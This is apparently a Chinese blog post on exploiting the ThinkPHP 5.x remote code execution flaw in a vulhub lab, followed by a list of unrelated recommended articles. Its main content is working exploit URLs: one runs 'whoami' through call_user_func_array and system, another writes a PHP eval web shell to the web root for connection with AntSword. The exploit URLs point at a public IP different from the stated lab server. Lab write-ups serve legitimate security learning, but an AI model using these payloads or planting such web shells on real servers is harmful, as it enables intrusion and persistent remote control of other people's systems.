Thinkphp(TP)框架漏洞攻略

故事与他6452025-03-26 2:07

Thinkphp5x远程命令执⾏及getshell

环境配置

云服务器:121.40.229.129:8080

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:http://121.40.229.129:8080/

远程命令执⾏

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

根⽬录⽣成11.php ⽂件

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(\$_POST[cmd]);?%3E%22%20%3E11.php

使用蚁剑连接成功

相关推荐
诸神黄昏EX6 小时前
Android Build系列专题【篇四:编译相关语法】
android
fruge7 小时前
Ubuntu服务器已下载Nginx安装包的安装指南
服务器·nginx·ubuntu
孤独得猿8 小时前
聊天室项目开发——etcd的安装和使用
linux·服务器·c++·etcd
siriuuus8 小时前
Linux Tomcat 简单使用及 Nginx 反向代理
linux·nginx·tomcat
雨白9 小时前
优雅地处理协程:取消机制深度剖析
android·kotlin
楚韵天工9 小时前
宠物服务平台(程序+文档)
java·网络·数据库·spring cloud·编辑器·intellij-idea·宠物
leon_zeng09 小时前
更改 Android 应用 ID (ApplicationId) 后遭遇记
android·发布
竹等寒10 小时前
Linux-网络安全私房菜(二)
linux·服务器·web安全
早睡冠军候选人10 小时前
Ansible学习----Ansible Playbook
运维·服务器·学习·云原生·容器·ansible
sulikey10 小时前
从实验出发深入理解Linux目录权限:r、w、x分别控制什么?能否进入目录到底由谁决定?
linux·运维·服务器·ubuntu·centos
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03UV安装并设置国内源04Linux下V2Ray安装配置指南05KGG转MP3工具|非KGM文件|解密音频06两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答07荣耀手机2025年10月发布的新品Magic8比起Magic7,在硬件、性能、价格等上有什么区别,有什么优势08Java IO 流 + MinIO:游戏玩家自定义头像上传(格式校验、压缩处理、存储管理)09windows找不到gpedit.msc(本地组策略编辑器)10GitLab 零基础入门指南:从安装到项目管理全流程